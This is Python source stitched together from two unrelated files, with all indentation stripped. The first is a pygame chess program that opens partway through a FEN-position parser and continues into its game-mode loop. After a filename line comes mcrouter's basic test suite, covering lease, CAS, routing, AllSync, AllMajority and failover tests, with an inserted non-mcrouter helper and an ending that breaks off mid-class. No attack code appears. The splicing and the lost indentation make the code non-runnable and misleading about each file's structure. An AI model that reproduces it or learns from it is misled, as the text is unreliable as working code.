pieces.white_bishops_inf = [[2, 0, False], [5, 0, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.white_knights_inf = [[1, 0, False], [6, 0, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.white_rooks_inf = [[0, 0, False, False], [7, 0, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False]]
pieces.white_queens_inf = [[3, 0, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.white_king_inf = [[4, 0, False, False]]
pieces.black_pawns_inf = [[0, 6, False, False], [1, 6, False, False], [2, 6, False, False], [3, 6, False, False], [4, 6, False, False], [5, 6, False, False], [6, 6, False, False], [7, 6, False, False]]
pieces.black_bishops_inf = [[2, 7, False], [5, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.black_knights_inf = [[6, 7, False], [1, 7, False], [6, 3, False], [0, 3, False], [2, 0, False], [2, 6, False], [6, 2, False], [0, 2, False], [0, 7, False], [0, 7, False]]
pieces.black_rooks_inf = [[0, 7, False, False], [7, 7, False, False], [2, 0, False, False], [4, 6, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False]]
pieces.black_queens_inf = [[3, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.black_king_inf = [[4, 7, False, False]]
fen_stage = 0
x = 0
y = 7
for char in fen:
if char == " ":
fen_stage += 1
elif fen_stage == 0:
if char == "/":
x = -1
y -= 1
elif char.isnumeric():
x += int(char) - 1
elif char == "P":
count = 0
while count <= 7:
if pieces.white_pawns_inf[count][2] == False:
pieces.white_pawns_inf[count][0] = x
pieces.white_pawns_inf[count][1] = y
pieces.white_pawns_inf[count][2] = True
if y == 1:
pieces.white_pawns_inf[count][3] = True
break
else:
count += 1
elif char == "B":
count = 0
while count <= 9:
if pieces.white_bishops_inf[count][2] == False:
pieces.white_bishops_inf[count][0] = x
pieces.white_bishops_inf[count][1] = y
pieces.white_bishops_inf[count][2] = True
break
else:
count += 1
elif char == "N":
count = 0
while count <= 9:
if pieces.white_knights_inf[count][2] == False:
pieces.white_knights_inf[count][0] = x
pieces.white_knights_inf[count][1] = y
pieces.white_knights_inf[count][2] = True
break
else:
count += 1
elif char == "R":
count = 0
while count <= 9:
if pieces.white_rooks_inf[count][2] == False:
pieces.white_rooks_inf[count][0] = x
pieces.white_rooks_inf[count][1] = y
pieces.white_rooks_inf[count][2] = True
break
else:
count += 1
elif char == "Q":
count = 0
while count <= 8:
if pieces.white_queens_inf[count][2] == False:
pieces.white_queens_inf[count][0] = x
pieces.white_queens_inf[count][1] = y
pieces.white_queens_inf[count][2] = True
break
else:
count += 1
elif char == "K":
if pieces.white_king_inf[0][2] == False:
pieces.white_king_inf[0][0] = x
pieces.white_king_inf[0][1] = y
pieces.white_king_inf[0][2] = True
elif char == "p":
count = 0
while count <= 7:
if pieces.black_pawns_inf[count][2] == False:
pieces.black_pawns_inf[count][0] = x
pieces.black_pawns_inf[count][1] = y
pieces.black_pawns_inf[count][2] = True
if y == 6:
pieces.black_pawns_inf[count][3] = True
break
else:
count += 1
elif char == "b":
count = 0
while count <= 9:
if pieces.black_bishops_inf[count][2] == False:
pieces.black_bishops_inf[count][0] = x
pieces.black_bishops_inf[count][1] = y
pieces.black_bishops_inf[count][2] = True
break
else:
count += 1
elif char == "n":
count = 0
while count <= 9:
if pieces.black_knights_inf[count][2] == False:
pieces.black_knights_inf[count][0] = x
pieces.black_knights_inf[count][1] = y
pieces.black_knights_inf[count][2] = True
break
else:
count += 1
elif char == "r":
count = 0
while count <= 9:
if pieces.black_rooks_inf[count][2] == False:
pieces.black_rooks_inf[count][0] = x
pieces.black_rooks_inf[count][1] = y
pieces.black_rooks_inf[count][2] = True
break
else:
count += 1
elif char == "q":
count = 0
while count <= 8:
if pieces.black_queens_inf[count][2] == False:
pieces.black_queens_inf[count][0] = x
pieces.black_queens_inf[count][1] = y
pieces.black_queens_inf[count][2] = True
break
else:
count += 1
elif char == "k":
if pieces.black_king_inf[0][2] == False:
pieces.black_king_inf[0][0] = x
pieces.black_king_inf[0][1] = y
pieces.black_king_inf[0][2] = True
x += 1
elif fen_stage == 1:
if char == "w":
startup.white_turn = True
elif char == "b":
startup.white_turn = False
elif fen_stage == 2:
if char == "K":
pieces.white_king_inf[0][3] = True
for i in range(0, 10):
if pieces.white_rooks_inf[i][2] == True and pieces.white_rooks_inf[i][0] == 7 and pieces.white_rooks_inf[i][1] == 0:
pieces.white_rooks_inf[i][3] = True
elif char == "Q":
pieces.white_king_inf[0][3] = True
for i in range(0, 10):
if pieces.white_rooks_inf[i][2] == True and pieces.white_rooks_inf[i][0] == 0 and pieces.white_rooks_inf[i][1] == 0:
pieces.white_rooks_inf[i][3] = True
elif char == "k":
pieces.black_king_inf[0][3] = True
for i in range(0, 10):
if pieces.black_rooks_inf[i][2] == True and pieces.black_rooks_inf[i][0] == 7 and pieces.black_rooks_inf[i][1] == 7:
pieces.black_rooks_inf[i][3] = True
elif char == "q":
pieces.black_king_inf[0][3] = True
for i in range(0, 10):
if pieces.black_rooks_inf[i][2] == True and pieces.black_rooks_inf[i][0] == 0 and pieces.black_rooks_inf[i][1] == 7:
pieces.black_rooks_inf[i][3] = True
elif fen_stage == 3:
if char.isnumeric():
if startup.white_turn == True:
pieces.en_passant_x_y[1] = int(char) - 2
else:
pieces.en_passant_x_y[1] = int(char)
else:
pieces.en_passant_x_y[0] = self.get_column_char(char)
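# Start owns the pygame window and the main loop. Tkinter is used only to read
# the screen height so the board can be sized to fit the display.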
class Start():
def __init__(self):
root = Tk()
#width = root.winfo_screenwidth()
self.screen_height = root.winfo_screenheight() * 0.9
# Round the window height down to a multiple of 8 so the 8x8 board tiles divide it evenly.
self.screen_height = math.trunc(self.screen_height - (self.screen_height % 8))
pygame.init()
self.screen = pygame.display.set_mode((self.screen_height, self.screen_height))
pygame.display.set_caption("Chess")
self.tile_size = self.screen_height // 8
self.run = True
self.update = False
self.white_turn = True
self.playing_as_white = True
self.auto_rotate = False
self.your_turn = True
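# Main loop: keeps the pygame window responsive and, whenever a move has been
# completed (self.update), hands control to the active game mode on a new
# thread (auto-play, one player or two player).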
def start(self):
self.player_customisations_thread = threading.Thread(target = self.player_customisations_func)
self.player_customisations_thread.start()
while self.run:
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.run = False
if self.update == True:
self.update = False
if self.auto_move == True:
self.auto_move_thread = threading.Thread(target = self.auto_move_func)
self.auto_move_thread.start()
elif self.one_player == True:
self.one_player_thread = threading.Thread(target = self.one_player_func)
self.one_player_thread.start()
elif self.two_player == True:
self.two_player_thread = threading.Thread(target = self.two_player_func)
self.two_player_thread.start()
pygame.quit()
def player_customisations_func(self):
board.draw_board()
pieces.draw_pieces_white()
pygame.display.update()
while True:
print("How many players? (0-2)")
player_amount = input()
try:
player_amount = int(player_amount)
if player_amount >= 0 and player_amount <= 2:
break
else:
print("That is not a valid number.")
except ValueError:
print("That is not a valid number.")
self.auto_move = False
self.one_player = False
self.two_player = False
if player_amount == 0:
self.auto_move = True
elif player_amount == 1:
self.one_player = True
while True:
print("Do you want to play as white, black or a random colour? (w/b/r)")
playing_as_input = input()
if playing_as_input == "w":
self.playing_as_white = True
break
elif playing_as_input == "b":
self.playing_as_white = False
break
elif playing_as_input == "r":
self.playing_as_white = random.choice([True, False])
break
else:
print("That is not a valid answer.")
self.your_turn = self.playing_as_white
elif player_amount == 2:
self.two_player = True
while True:
print("Do you want to rotate the board automatically? (y/n)")
board_rotate_input = input()
if board_rotate_input == "y":
self.auto_rotate = True
break
elif board_rotate_input == "n":
self.auto_rotate = False
break
else:
print("That is not a valid answer.")
while True:
print("Do you want to play from a pre-determined position? (y/n)")
predetermined_position_input = input()
if predetermined_position_input == "y":
while True:
print("Paste the fen position.")
fen_position = input()
try:
notation.load_fen_position(fen_position)
break
except Exception:
print("That is not a valid position.")
board.draw_board()
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
pygame.display.update()
break
elif predetermined_position_input == "n":
break
else:
print("That is not a valid answer.")
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
self.update = True
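# Zero-player mode: plays a random legal move for whichever side is to move,
# then redraws the board and flags the main loop to schedule the next move.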
def auto_move_func(self):
pieces.white_black_occupation()
pieces.calc_legal_moves()
pieces.check_checks()
if len(pieces.legal_moves) > 0:
time.sleep(0)
pieces.convert_pieces_to_matrix()
notation_val, take = pieces.convert_to_easy_notation(pieces.legal_moves[random.randint(0, len(pieces.legal_moves) - 1)])
pieces.move_piece(notation_val, take)
half_move_limit, check_mate = pieces.half_move_check()
if half_move_limit == True and check_mate == False:
print("It's a draw by too many moves!")
self.auto_move = False
self.white_turn = not self.white_turn
board.draw_board()
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
self.update = True
else:
pieces.no_moves()
self.auto_move = False
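# One-player mode: prompts the human for a move from the printed legal-move
# list on their turn, otherwise picks a random move for the computer.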
def one_player_func(self):
pieces.white_black_occupation()
pieces.calc_legal_moves()
pieces.check_checks()
if len(pieces.legal_moves) > 0:
if self.your_turn == True:
print(pieces.legal_moves)
while True:
print("Choose a move! (Copy the move exactly)")
move_choice = input()
if move_choice in pieces.legal_moves:
break
else:
print("That is not a valid move.")
else:
time.sleep(0)
pieces.convert_pieces_to_matrix()
move_choice = pieces.legal_moves[random.randint(0, len(pieces.legal_moves) - 1)]
self.your_turn = not self.your_turn
notation_val, take = pieces.convert_to_easy_notation(move_choice)
pieces.move_piece(notation_val, take)
half_move_limit, check_mate = pieces.half_move_check()
if half_move_limit == True and check_mate == False:
print("It's a draw by too many moves!")
self.one_player = False
self.white_turn = not self.white_turn
board.draw_board()
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
self.update = True
else:
pieces.no_moves()
self.one_player = False
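# Two-player mode: both sides enter moves at the console; the board is rotated
# after every move when auto_rotate is enabled, and the FEN of the resulting
# position is printed.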
def two_player_func(self):
pieces.white_black_occupation()
pieces.calc_legal_moves()
pieces.check_checks()
if len(pieces.legal_moves) > 0:
print(pieces.legal_moves)
while True:
print("Choose a move! (Copy the move exactly)")
move_choice = input()
if move_choice in pieces.legal_moves:
break
else:
print("That is not a valid move.")
notation_val, take = pieces.convert_to_easy_notation(move_choice)
pieces.move_piece(notation_val, take)
half_move_limit, check_mate = pieces.half_move_check()
if half_move_limit == True and check_mate == False:
print("It's a draw by too many moves!")
self.two_player = False
self.white_turn = not self.white_turn
board.draw_board()
if self.auto_rotate == True:
self.playing_as_white = self.white_turn
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
fen = notation.create_fen_position()
print(fen)
self.update = True
else:
pieces.no_moves()
self.two_player = False
startup = Start()
board = Board()
pieces = Pieces()
notation = Notation()
startup.start()
test_mcrouter_basic.py
# Copyright (c) 2017-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the LICENSE
# file in the root directory of this source tree.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from threading import Thread
import time
from mcrouter.test.MCProcess import McrouterClient, Memcached, Mcrouter
from mcrouter.test.McrouterTestCase import McrouterTestCase
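# Base fixture: starts a single memcached backend (the first host in the
# config) and provides a helper that launches mcrouter against it with any
# extra command-line arguments a test needs.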
class TestMcrouterBasicBase(McrouterTestCase):
config = './mcrouter/test/mcrouter_test_basic_1_1_1.json'
null_route_config = './mcrouter/test/test_nullroute.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc = self.add_server(self.make_memcached())
def get_mcrouter(self, additional_args=[]):
return self.add_mcrouter(
self.config, extra_args=self.extra_args + additional_args)
class TestMcrouterBasic(TestMcrouterBasicBase):
def test_basic_lease(self):
mcr = self.get_mcrouter()
result = mcr.leaseGet("testkey")
real_token = result["token"]
self.assertNotEqual(real_token, None)
result["value"] = "newvalue"
result["token"] = 42000
self.assertFalse(mcr.leaseSet("testkey", result))
result["token"] = real_token
self.assertTrue(mcr.leaseSet("testkey", result))
result2 = mcr.leaseGet("testkey")
self.assertEqual(result2["token"], None)
self.assertEqual(result2["value"], "newvalue")
# lease-get followed by a delete means the next lease-set will fail
result = mcr.leaseGet("newtestkey")
self.assertFalse(mcr.delete("newtestkey"))
self.assertFalse(mcr.leaseSet("newtestkey", result))
def test_invalid_key(self):
"""
Tests behavior when mcrouter routes keys which have prefixes that are
not in the config.
"""
mcr = self.get_mcrouter()
invalid_key = '/blah/bloh/key'
self.assertFalse(mcr.set(invalid_key, 'value'))
self.assertEqual(mcr.get(invalid_key), "SERVER_ERROR local error")
def test_stats(self):
mcr = self.get_mcrouter(['--proxy-threads=8'])
# Stats without args
res = mcr.issue_command_and_read_all('stats\r\n')
self.assertIsNotNone(res)
res = mcr.issue_command_and_read_all('stats \r\n')
self.assertIsNotNone(res)
res = mcr.issue_command_and_read_all('stats\n')
self.assertIsNotNone(res)
res = mcr.issue_command_and_read_all('stats \n')
self.assertIsNotNone(res)
# Stats with args
args = ['detailed', 'cmd-error', 'servers', 'suspect_servers', 'count']
for arg in args:
res = mcr.issue_command_and_read_all('stats{0}\r\n'.format(arg))
self.assertTrue('CLIENT_ERROR' in res)
res = mcr.issue_command_and_read_all('stats {0}\r\n'.format(arg))
self.assertTrue('END' in res)
res = mcr.issue_command_and_read_all('stats {0} \r\n'.format(arg))
self.assertTrue('END' in res)
res = mcr.issue_command_and_read_all('stats{0}\n'.format(arg))
self.assertTrue('CLIENT_ERROR' in res)
res = mcr.issue_command_and_read_all('stats {0}\n'.format(arg))
self.assertTrue('END' in res)
res = mcr.issue_command_and_read_all('stats {0} \n'.format(arg))
self.assertTrue('END' in res)
# Stats with invalid arg
res = mcr.issue_command_and_read_all('stats invalid_option\r\n')
self.assertTrue('CLIENT_ERROR' in res)
def test_stats_deadlock(self):
mcr = self.get_mcrouter(['--proxy-threads=8'])
def run_client(fail, port):
mc = McrouterClient(port)
mc.connect()
for i in range(1000):
s = mc.stats()
if not s:
fail[0] = True
return
f = [False]
ts = [Thread(target=run_client, args=(f, mcr.port)) for i in range(8)]
[t.start() for t in ts]
[t.join() for t in ts]
self.assertFalse(f[0])
def test_basic_cas(self):
mcr = self.get_mcrouter()
self.assertIsNone(mcr.cas('key', 'value', 1))
self.assertIsNone(mcr.gets('key'))
self.assertTrue(mcr.add('key', 'value'))
ret = mcr.gets('key')
self.assertIsNotNone(ret)
old_cas = ret['cas']
self.assertEqual(ret['value'], 'value')
self.assertTrue(mcr.cas('key', 'value2', ret["cas"]))
ret = mcr.gets('key')
self.assertEqual(ret['value'], 'value2')
self.assertNotEqual(old_cas, ret['cas'])
self.assertTrue(mcr.set('key', 'value2'))
self.assertFalse(mcr.cas('key', 'value3', ret['cas']))
self.assertEqual(mcr.gets('key')['value'], 'value2')
def test_shutdown(self):
mcr = self.get_mcrouter()
mcr.shutdown()
time.sleep(2)
self.assertFalse(mcr.is_alive())
def test_double_bind(self):
mcr1 = self.get_mcrouter()
time.sleep(1)
mcr2 = Mcrouter(self.null_route_config, port=mcr1.port)
time.sleep(2)
self.assertTrue(mcr1.is_alive())
self.assertFalse(mcr2.is_alive())
def test_set_exptime(self):
mcr = self.get_mcrouter()
# positive
self.assertTrue(mcr.set('key', 'value', exptime=10))
self.assertEqual(mcr.get('key'), 'value')
# negative
self.assertTrue(mcr.set('key', 'value', exptime=-10))
self.assertIsNone(mcr.get('key'))
# future: year 2033
self.assertTrue(mcr.set('key', 'value', exptime=2000000000))
self.assertEqual(mcr.get('key'), 'value')
# past
self.assertTrue(mcr.set('key', 'value', exptime=1432250000))
# items with an exptime in the past may take a second or two to expire
time.sleep(2)
self.assertIsNone(mcr.get('key'))
class TestMcrouterBasicTouch(TestMcrouterBasicBase):
def __init__(self, *args, **kwargs):
super(TestMcrouterBasicTouch, self).__init__(*args, **kwargs)
self.use_mock_mc = True
def test_basic_touch(self):
mcr = self.get_mcrouter()
# positive
self.assertTrue(mcr.set('key', 'value', exptime=0))
self.assertEqual(mcr.get('key'), 'value')
self.assertEqual(mcr.touch('key', 20), "TOUCHED")
self.assertEqual(mcr.get('key'), 'value')
# negative
self.assertEqual(mcr.touch('fake_key', 20), "NOT_FOUND")
self.assertIsNone(mcr.get('fake_key'))
# negative exptime
self.assertTrue(mcr.set('key1', 'value', exptime=10))
self.assertEqual(mcr.get('key1'), 'value')
self.assertEqual(mcr.touch('key1', -20), "TOUCHED")
self.assertIsNone(mcr.get('key1'))
# past
self.assertTrue(mcr.set('key2', 'value', exptime=10))
self.assertEqual(mcr.get('key'), 'value')
self.assertEqual(mcr.touch('key', 1432250000), "TOUCHED")
self.assertIsNone(mcr.get('key'))
class TestMcrouterInvalidRouteBase(McrouterTestCase):
config = './mcrouter/test/mcrouter_test_basic_1_1_1.json'
extra_args = ['--send-invalid-route-to-default']
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc = self.add_server(self.make_memcached())
def get_mcrouter(self, additional_args=[]):
return self.add_mcrouter(
self.config, extra_args=self.extra_args + additional_args)
class TestMcrouterInvalidRoute(TestMcrouterInvalidRouteBase):
def test_basic_invalid_route(self):
mcr = self.get_mcrouter()
self.assertTrue(mcr.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
self.assertTrue(mcr.set("/././key", "value2"))
self.assertEqual(mcr.get("/././key"), "value2")
self.assertEqual(mcr.get("/f/f/key"), "value2")
self.assertEqual(mcr.get("/test/test/key"), "value2")
self.assertEqual(mcr.get("key"), "value2")
self.assertTrue(mcr.set("/a/a/key", "value3"))
self.assertEqual(mcr.get("/a/a/key"), "value3")
self.assertEqual(mcr.get("key"), "value3")
self.assertTrue(mcr.set("/*/a/key", "value4"))
self.assertEqual(mcr.get("/a/a/key"), "value4")
self.assertEqual(mcr.get("key"), "value4")
self.assertTrue(mcr.set("/*/*/key", "value4"))
self.assertEqual(mcr.get("/a/a/key"), "value4")
self.assertEqual(mcr.get("key"), "value4")
class TestMcrouterInvalidRouteAppendPrepend(TestMcrouterInvalidRouteBase):
def __init__(self, *args, **kwargs):
super(TestMcrouterInvalidRouteAppendPrepend, self).__init__(
*args, **kwargs)
self.use_mock_mc = True
def test_basic_invalid_route(self):
mcr = self.get_mcrouter()
self.assertTrue(mcr.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
self.assertEqual(mcr.append("/*/*/key", "abc"), "STORED")
self.assertEqual(mcr.get("/a/a/key"), "valueabc")
self.assertEqual(mcr.get("key"), "valueabc")
self.assertEqual(mcr.prepend("/*/*/key", "123"), "STORED")
self.assertEqual(mcr.get("/a/a/key"), "123valueabc")
self.assertEqual(mcr.get("key"), "123valueabc")
class TestMcrouterBasic2(McrouterTestCase):
config = './mcrouter/test/mcrouter_test_basic_2_1_1.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
def get_mcrouter(self, additional_args=[]):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args + additional_args)
def test_prefix_routing(self):
mcr = self.get_mcrouter()
# first test default routing prefix
self.mc1.set("cluster1_key", "cluster1")
self.assertEqual(mcr.get("cluster1_key"), "cluster1")
# next set to a remote cluster
mcr.set("/b/b/cluster2_key_router", "cluster2_router")
self.assertEqual(self.mc2.get("cluster2_key_router"), "cluster2_router")
# try fetching a value from a remote cluster
self.mc2.set("cluster2_key", "cluster2")
self.assertEqual(self.mc2.get("cluster2_key"), "cluster2")
self.assertEqual(mcr.get("/b/b/cluster2_key"), "cluster2")
def test_delete(self):
mcr = self.get_mcrouter()
mcr.set('foobarbizbang', 'some_value')
self.assertTrue(mcr.delete('foobarbizbang'))
self.assertFalse(mcr.delete('foobarbizbang2'))
self.assertTrue(mcr.set('hello', 'world'))
self.assertEqual(mcr.get('hello'), 'world')
def test_malformed_umbrella_length(self):
mcr = self.get_mcrouter()
# Send an umbrella request with a malformed length, and check that we
# get something back from the server (i.e. that it doesn't crash)
mcr.socket.settimeout(10)
mcr.socket.send('}}\x00\x01\x00\x00\x00\x00')
data = mcr.socket.recv(1024)
self.assertTrue(data)
# otherwise the recv() above would hang
def test_use_big_value(self):
mcr = self.get_mcrouter(['--big-value-split-threshold=100'])
reply = mcr.get('__mcrouter__.route_handles(get,test)')
self.assertEqual(reply.count('big-value'), 1)
def test_no_big_value(self):
mcr = self.get_mcrouter()
reply = mcr.get('__mcrouter__.route_handles(get,test)')
self.assertNotIn('big-value', reply)
def test_enable_logging_route(self):
mcr = self.get_mcrouter(['--enable-logging-route'])
reply = mcr.get('__mcrouter__.route_handles(get,test)')
self.assertEqual(reply.count('logging'), 1)
def test_no_logging_route(self):
mcr = self.get_mcrouter()
reply = mcr.get('__mcrouter__.route_handles(get,test)')
self.assertNotIn('logging', reply)
class TestBasicAllSyncBase(McrouterTestCase):
config = './mcrouter/test/test_basic_all_sync.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(self.make_memcached())
self.mc2 = self.add_server(self.make_memcached())
self.mc3 = self.add_server(self.make_memcached())
class TestBasicAllSync(TestBasicAllSyncBase):
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_basic_all_sync(self):
"""
Tests that the responses are being aggregated and that the most awful
one (based on the awfulness map) is being returned.
"""
mcr = self.get_mcrouter()
# set the key in all three clusters
self.mc1.set("key", "value")
self.mc2.set("key", "value")
self.mc3.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
# delete will return True on DELETED
# will return False on NOT_FOUND
# perform a delete and check the response
# the aggregated response should be DELETED
self.assertTrue(mcr.delete("key"))
# set key in only one cluster
self.mc1.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
# the aggregated response should be NOT_FOUND
self.assertFalse(mcr.delete("key"))
class TestBasicAllSyncAppendPrependTouch(TestBasicAllSyncBase):
def __init__(self, *args, **kwargs):
super(TestBasicAllSyncAppendPrependTouch, self).__init__(
*args, **kwargs)
self.use_mock_mc = True
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_append_prepend_all_sync(self):
"""
Tests that append and prepend work with AllSync. We rely on these
tests to verify correctness of append/prepend since we don't use
these commands in production.
"""
mcr = self.get_mcrouter()
mcr.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
self.assertEqual(mcr.append("key", "abc"), "STORED")
self.assertEqual(mcr.prepend("key", "123"), "STORED")
self.assertEqual(self.mc1.get("key"), "123valueabc")
self.assertEqual(self.mc2.get("key"), "123valueabc")
self.assertEqual(self.mc3.get("key"), "123valueabc")
self.assertEqual(mcr.get("key"), "123valueabc")
self.mc1.set("key2", "value")
self.assertEqual(self.mc1.get("key2"), "value")
self.assertEqual(self.mc1.append("key2", "xyz"), "STORED")
self.assertEqual(self.mc1.get("key2"), "valuexyz")
self.assertFalse(mcr.get("key2"))
self.mc1.set("key3", "value")
self.assertEqual(self.mc1.get("key3"), "value")
self.assertEqual(self.mc1.prepend("key3", "xyz"), "STORED")
self.assertEqual(self.mc1.get("key3"), "xyzvalue")
self.assertFalse(mcr.get("key3"))
def test_touch_all_sync(self):
mcr = self.get_mcrouter()
mcr.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
self.assertEqual(mcr.touch("key", 3600), "TOUCHED")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
self.mc1.set("key2", "value")
self.assertEqual(self.mc1.get("key2"), "value")
self.assertEqual(self.mc1.touch("key2", 3600), "TOUCHED")
self.assertEqual(self.mc1.get("key2"), "value")
self.assertFalse(mcr.get("key2"))
mcr.set("key3", "value")
self.assertEqual(self.mc1.get("key3"), "value")
self.assertEqual(self.mc1.touch("key3", -10), "TOUCHED")
self.assertEqual(self.mc2.get("key3"), "value")
self.assertEqual(self.mc3.get("key3"), "value")
self.assertFalse(mcr.get("key3"))
class TestBasicAllFirst(McrouterTestCase):
config = './mcrouter/test/test_basic_all_first.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
self.mc3 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_basic_all_first(self):
"""
Tests that the first non-tko response is returned
"""
mcr = self.get_mcrouter()
self.mc1.terminate()
self.assertTrue(mcr.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
class TestBasicAllMajority(McrouterTestCase):
config = './mcrouter/test/test_basic_all_majority.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
self.mc3 = self.add_server(Memcached())
self.mc4 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_basic_all_majority(self):
"""
Tests that the majority response (ties broken by awfulness) is being
returned
"""
mcr = self.get_mcrouter()
# set the key in all four clusters
self.mc1.set("key", "value")
self.mc2.set("key", "value")
self.mc3.set("key", "value")
self.mc4.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(self.mc4.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
# perform a delete and check the response
# the majority response should be DELETED
self.assertTrue(mcr.delete("key"))
# make sure all deletes complete (otherwise they can race
# with the sets below)
time.sleep(1)
# set key in three clusters
self.assertTrue(self.mc1.set("key", "value"))
self.assertTrue(self.mc2.set("key", "value"))
self.assertTrue(self.mc3.set("key", "value"))
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
# the majority response should be DELETED
self.assertTrue(mcr.delete("key"))
# make sure all deletes complete (otherwise they can race
# with the sets below)
time.sleep(1)
        # set the key in only one cluster
self.mc1.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
# the majority response should be NOT_FOUND
self.assertFalse(mcr.delete("key"))
# make sure all deletes complete (otherwise they can race
# with the sets below)
time.sleep(1)
# set key in two out of four clusters
self.mc1.set("key", "value")
self.mc2.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
        # the majority response should be NOT_FOUND,
        # since ties are broken by the awfulness map
self.assertFalse(mcr.delete("key"))
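# Hedged sketch, not mcrouter code: the AllMajority behaviour exercised above
# amounts to "send the request to every child, pick the reply most children
# agree on, and break ties by a reply-badness ranking". The ranking below is a
# hypothetical stand-in for mcrouter's awfulness map.
def _majority_reply_sketch(replies, awfulness=("DELETED", "NOT_FOUND")):
    from collections import Counter
    counts = Counter(replies)
    # prefer the most frequent reply; on a tie prefer the "worse" one, which is
    # why a 2-2 DELETED/NOT_FOUND split resolves to NOT_FOUND in the test above
    return max(counts, key=lambda r: (counts[r],
                                      awfulness.index(r) if r in awfulness else -1))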
class TestBasicFailover(McrouterTestCase):
config = './mcrouter/test/test_basic_failover.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_failover(self):
"""
Tests that the failover path works.
"""
# default path is mctestc01
mcr = self.get_mcrouter()
# Go through the default route and verify a get.
self.assertTrue(self.mc1.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
self.mc1.terminate()
# Go through the failover now.
# We assert twice since in the first call mcrouter will discover
# a tko host and it short circuits the second time.
self.assertEqual(mcr.get("key"), None)
self.assertEqual(mcr.get("key"), None)
# Set in the failover and check.
self.assertTrue(self.mc2.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
def test_failover_negative_exptime(self):
mcr = self.get_mcrouter()
# Go through the default route and verify a get.
self.assertTrue(mcr.set("key", "value", exptime=0))
self.assertEqual(mcr.get("key"), "value")
# Exptime using negative value: past
self.assertTrue(mcr.set("key", "value", exptime=-10))
self.assertIsNone(mcr.get("key"))
self.mc1.terminate()
# Go through the failover now.
# We assert twice since in the first call mcrouter will discover
# a tko host and it short circuits the second time.
self.assertEqual(mcr.get("key"), None)
self.assertEqual(mcr.get("key"), None)
# Check get failover still works
self.assertTrue(self.mc2.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
# Exptime using negative value: past
self.assertTrue(mcr.set("key", "value", exptime=-10))
self.assertIsNone(mcr.get("key"))
class TestBasicFailoverOverride(McrouterTestCase):
